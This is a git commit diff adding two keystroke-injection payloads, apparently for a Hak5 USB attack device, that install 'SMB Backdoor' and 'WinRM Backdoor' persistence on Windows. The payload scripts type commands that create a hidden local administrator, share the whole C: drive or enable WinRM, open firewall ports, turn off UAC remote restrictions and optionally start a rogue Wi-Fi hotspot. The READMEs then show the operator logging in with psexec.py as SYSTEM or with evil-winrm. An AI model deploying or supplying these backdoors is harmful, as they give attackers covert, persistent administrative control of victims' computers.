Merge branch 'hak5:master' into master
commit
003ee1b9e7
|
@ -0,0 +1,73 @@
|
||||||
|
# "Microsoft Windows" SMB Backdoor
|
||||||
|
|
||||||
|
- Title: "Microsoft Windows" SMB Backdoor
|
||||||
|
- Author: TW-D
|
||||||
|
- Version: 1.0
|
||||||
|
- Target: Microsoft Windows
|
||||||
|
- Category: Remote Access
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
1) Adds a user account.
|
||||||
|
2) Adds this local user to local administrator group.
|
||||||
|
3) If the target computer is equipped with a compatible Wi-Fi card :
|
||||||
|
Avoids security measures on the internal network with the
|
||||||
|
creation of a wireless "Hosted Network".
|
||||||
|
4) Shares "C:\" directory.
|
||||||
|
5) Adds a rule to the firewall.
|
||||||
|
6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
|
||||||
|
7) Hides user account.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
From "payload.txt" change the values of the following constants :
|
||||||
|
```bash
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly SMB_USERNAME="BB_User"
|
||||||
|
readonly SMB_PASSWORD="BB_P@ssW0rD"
|
||||||
|
|
||||||
|
##
|
||||||
|
# (any) Administrators
|
||||||
|
# (fr) Administrateurs
|
||||||
|
##
|
||||||
|
readonly GROUP_NAME="Administrators"
|
||||||
|
|
||||||
|
##
|
||||||
|
# Can be set to "true" if the target computer
|
||||||
|
# is equipped with a compatible Wi-Fi card.
|
||||||
|
##
|
||||||
|
readonly WIRELESS_HOTSPOT="false"
|
||||||
|
|
||||||
|
readonly SMB_SHARE="BB_SHARE"
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
## Exploitation
|
||||||
|
|
||||||
|
>
|
||||||
|
> The name of the access point and the security key will be those defined by the values of the constants : **SMB_SHARE** and **SMB_PASSWORD**.
|
||||||
|
>
|
||||||
|
|
||||||
|
```
|
||||||
|
hacker@hacker-computer:~$ nmcli dev wifi connect "<SMB_SHARE>" password "<SMB_PASSWORD>"
|
||||||
|
```
|
||||||
|
|
||||||
|
>
|
||||||
|
> The connection identifiers will be those defined by the values of the constants : **SMB_USERNAME** and **SMB_PASSWORD**.
|
||||||
|
>
|
||||||
|
|
||||||
|
```
|
||||||
|
hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./<SMB_USERNAME>:<SMB_PASSWORD>@<TARGET>
|
||||||
|
C:\WINDOWS\system32> whoami
|
||||||
|
nt authority\system
|
||||||
|
```
|
||||||
|
|
||||||
|
>
|
||||||
|
> The share name and identifiers will be those defined by the values of the constants : **SMB_SHARE**, **SMB_USERNAME** and **SMB_PASSWORD**.
|
||||||
|
>
|
||||||
|
|
||||||
|
```
|
||||||
|
smb://<TARGET>/<SMB_SHARE>/
|
||||||
|
```
|
|
@ -0,0 +1,139 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: "Microsoft Windows" SMB Backdoor
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# 1) Adds a user account.
|
||||||
|
# 2) Adds this local user to local administrator group.
|
||||||
|
# 3) If the target computer is equipped with a compatible Wi-Fi card :
|
||||||
|
# Avoids security measures on the internal network with the
|
||||||
|
# creation of a wireless "Hosted Network".
|
||||||
|
# 4) Shares "C:\" directory.
|
||||||
|
# 5) Adds a rule to the firewall.
|
||||||
|
# 6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
|
||||||
|
# 7) Hides user account.
|
||||||
|
#
|
||||||
|
# Author: TW-D
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Remote Access
|
||||||
|
# Target: Microsoft Windows
|
||||||
|
# Attackmode: HID
|
||||||
|
#
|
||||||
|
# TESTED ON
|
||||||
|
# ===============
|
||||||
|
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||||
|
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||||
|
#
|
||||||
|
# REQUIREMENTS
|
||||||
|
# ===============
|
||||||
|
# The target user must belong to the 'Administrators' group.
|
||||||
|
#
|
||||||
|
# STATUS
|
||||||
|
# ===============
|
||||||
|
# Magenta solid ................................... SETUP
|
||||||
|
# Yellow single blink ............................. ATTACK
|
||||||
|
# Yellow double blink ............................. STAGE2
|
||||||
|
# Yellow triple blink ............................. STAGE3
|
||||||
|
# Yellow quadruple blink .......................... STAGE4
|
||||||
|
# White fast blink ................................ CLEANUP
|
||||||
|
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly SMB_USERNAME="BB_User"
|
||||||
|
readonly SMB_PASSWORD="BB_P@ssW0rD"
|
||||||
|
|
||||||
|
##
|
||||||
|
# (any) Administrators
|
||||||
|
# (fr) Administrateurs
|
||||||
|
##
|
||||||
|
readonly GROUP_NAME="Administrators"
|
||||||
|
|
||||||
|
##
|
||||||
|
# Can be set to "true" if the target computer
|
||||||
|
# is equipped with a compatible Wi-Fi card.
|
||||||
|
##
|
||||||
|
readonly WIRELESS_HOTSPOT="false"
|
||||||
|
|
||||||
|
readonly SMB_SHARE="BB_SHARE"
|
||||||
|
|
||||||
|
######## SETUP ########
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
######## ATTACK ########
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
Q DELAY 2000
|
||||||
|
Q GUI r
|
||||||
|
Q DELAY 7000
|
||||||
|
Q STRING "cmd"
|
||||||
|
Q DELAY 1500
|
||||||
|
Q CTRL-SHIFT ENTER
|
||||||
|
Q DELAY 7000
|
||||||
|
Q LEFTARROW
|
||||||
|
Q DELAY 5000
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 7000
|
||||||
|
|
||||||
|
LED STAGE2
|
||||||
|
|
||||||
|
Q STRING "NET USER ${SMB_USERNAME} ${SMB_PASSWORD} /ADD"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "NET LOCALGROUP ${GROUP_NAME} ${SMB_USERNAME} /ADD"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
if [ "${WIRELESS_HOTSPOT}" == "true" ]
|
||||||
|
then
|
||||||
|
|
||||||
|
LED SPECIAL
|
||||||
|
|
||||||
|
Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${SMB_SHARE} KEY=${SMB_PASSWORD}"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 5000
|
||||||
|
|
||||||
|
Q STRING "NETSH WLAN START HOSTEDNETWORK"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 5000
|
||||||
|
|
||||||
|
fi
|
||||||
|
|
||||||
|
LED STAGE3
|
||||||
|
|
||||||
|
Q STRING "NET SHARE ${SMB_SHARE}=C:\\ /GRANT:${SMB_USERNAME},FULL /REMARK:\"BRemote BShare\""
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Server Message Block for BB\" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
LED STAGE4
|
||||||
|
|
||||||
|
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${SMB_USERNAME} /t REG_DWORD /d 0"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
######## CLEANUP ########
|
||||||
|
|
||||||
|
LED CLEANUP
|
||||||
|
|
||||||
|
Q STRING "EXIT"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
|
|
||||||
|
shutdown -h 0
|
|
@ -0,0 +1,64 @@
|
||||||
|
# "Microsoft Windows" WinRM Backdoor
|
||||||
|
|
||||||
|
- Title: "Microsoft Windows" WinRM Backdoor
|
||||||
|
- Author: TW-D
|
||||||
|
- Version: 1.0
|
||||||
|
- Target: Microsoft Windows
|
||||||
|
- Category: Remote Access
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
1) Adds a user account.
|
||||||
|
2) Adds this local user to local administrator group.
|
||||||
|
3) If the target computer is equipped with a compatible Wi-Fi card :
|
||||||
|
Avoids security measures on the internal network with the
|
||||||
|
creation of a wireless "Hosted Network".
|
||||||
|
4) Enables "Windows Remote Management" with default settings.
|
||||||
|
5) Adds a rule to the firewall.
|
||||||
|
6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
|
||||||
|
7) Hides user account.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
From "payload.txt" change the values of the following constants :
|
||||||
|
```bash
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly WINDOWS_USERNAME="BB_User"
|
||||||
|
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
|
||||||
|
|
||||||
|
##
|
||||||
|
# (any) Administrators
|
||||||
|
# (fr) Administrateurs
|
||||||
|
##
|
||||||
|
readonly GROUP_NAME="Administrators"
|
||||||
|
|
||||||
|
##
|
||||||
|
# Can be set to "true" if the target computer
|
||||||
|
# is equipped with a compatible Wi-Fi card.
|
||||||
|
##
|
||||||
|
readonly WIRELESS_HOTSPOT="false"
|
||||||
|
readonly HOTSPOT_NAME="BB_HOTSPOT"
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
## Exploitation
|
||||||
|
|
||||||
|
>
|
||||||
|
> The name of the access point and the security key will be those defined by the values of the constants : **HOTSPOT_NAME** and **WINDOWS_PASSWORD**.
|
||||||
|
>
|
||||||
|
|
||||||
|
```
|
||||||
|
hacker@hacker-computer:~$ nmcli dev wifi connect "<HOTSPOT_NAME>" password "<WINDOWS_PASSWORD>"
|
||||||
|
```
|
||||||
|
|
||||||
|
>
|
||||||
|
> The connection identifiers will be those defined by the values of the constants : **WINDOWS_USERNAME** and **WINDOWS_PASSWORD**.
|
||||||
|
>
|
||||||
|
|
||||||
|
```
|
||||||
|
hacker@hacker-computer:~$ evil-winrm --ip <TARGET> --user <WINDOWS_USERNAME> --password '<WINDOWS_PASSWORD>'
|
||||||
|
*Evil-WinRM* PS C:\Users\<WINDOWS_USERNAME>\Documents> whoami
|
||||||
|
desktop-xxxxxxx\<WINDOWS_USERNAME>
|
||||||
|
```
|
|
@ -0,0 +1,142 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: "Microsoft Windows" WinRM Backdoor
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# 1) Adds a user account.
|
||||||
|
# 2) Adds this local user to local administrator group.
|
||||||
|
# 3) If the target computer is equipped with a compatible Wi-Fi card :
|
||||||
|
# Avoids security measures on the internal network with the
|
||||||
|
# creation of a wireless "Hosted Network".
|
||||||
|
# 4) Enables "Windows Remote Management" with default settings.
|
||||||
|
# 5) Adds a rule to the firewall.
|
||||||
|
# 6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
|
||||||
|
# 7) Hides user account.
|
||||||
|
#
|
||||||
|
# Author: TW-D
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Remote Access
|
||||||
|
# Target: Microsoft Windows
|
||||||
|
# Attackmode: HID
|
||||||
|
#
|
||||||
|
# TESTED ON
|
||||||
|
# ===============
|
||||||
|
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||||
|
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||||
|
#
|
||||||
|
# REQUIREMENTS
|
||||||
|
# ===============
|
||||||
|
# The target user must belong to the 'Administrators' group.
|
||||||
|
#
|
||||||
|
# STATUS
|
||||||
|
# ===============
|
||||||
|
# Magenta solid ................................... SETUP
|
||||||
|
# Yellow single blink ............................. ATTACK
|
||||||
|
# Yellow double blink ............................. STAGE2
|
||||||
|
# Yellow triple blink ............................. STAGE3
|
||||||
|
# Yellow quadruple blink .......................... STAGE4
|
||||||
|
# White fast blink ................................ CLEANUP
|
||||||
|
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly WINDOWS_USERNAME="BB_User"
|
||||||
|
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
|
||||||
|
|
||||||
|
##
|
||||||
|
# (any) Administrators
|
||||||
|
# (fr) Administrateurs
|
||||||
|
##
|
||||||
|
readonly GROUP_NAME="Administrators"
|
||||||
|
|
||||||
|
##
|
||||||
|
# Can be set to "true" if the target computer
|
||||||
|
# is equipped with a compatible Wi-Fi card.
|
||||||
|
##
|
||||||
|
readonly WIRELESS_HOTSPOT="false"
|
||||||
|
readonly HOTSPOT_NAME="BB_HOTSPOT"
|
||||||
|
|
||||||
|
######## SETUP ########
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
######## ATTACK ########
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
Q DELAY 2000
|
||||||
|
Q GUI r
|
||||||
|
Q DELAY 7000
|
||||||
|
Q STRING "cmd"
|
||||||
|
Q DELAY 1500
|
||||||
|
Q CTRL-SHIFT ENTER
|
||||||
|
Q DELAY 7000
|
||||||
|
Q LEFTARROW
|
||||||
|
Q DELAY 5000
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 7000
|
||||||
|
|
||||||
|
LED STAGE2
|
||||||
|
|
||||||
|
Q STRING "NET USER ${WINDOWS_USERNAME} ${WINDOWS_PASSWORD} /ADD"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "NET LOCALGROUP ${GROUP_NAME} ${WINDOWS_USERNAME} /ADD"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
if [ "${WIRELESS_HOTSPOT}" == "true" ]
|
||||||
|
then
|
||||||
|
|
||||||
|
LED SPECIAL
|
||||||
|
|
||||||
|
Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${HOTSPOT_NAME} KEY=${WINDOWS_PASSWORD}"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 5000
|
||||||
|
|
||||||
|
Q STRING "NETSH WLAN START HOSTEDNETWORK"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 5000
|
||||||
|
|
||||||
|
fi
|
||||||
|
|
||||||
|
LED STAGE3
|
||||||
|
|
||||||
|
Q STRING "WINRM QUICKCONFIG"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 3000
|
||||||
|
|
||||||
|
Q STRING "y"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Windows Remote Management for BB\" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
LED STAGE4
|
||||||
|
|
||||||
|
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${WINDOWS_USERNAME} /t REG_DWORD /d 0"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
######## CLEANUP ########
|
||||||
|
|
||||||
|
LED CLEANUP
|
||||||
|
|
||||||
|
Q STRING "EXIT"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
|
|
||||||
|
shutdown -h 0
|
Loading…
Reference in New Issue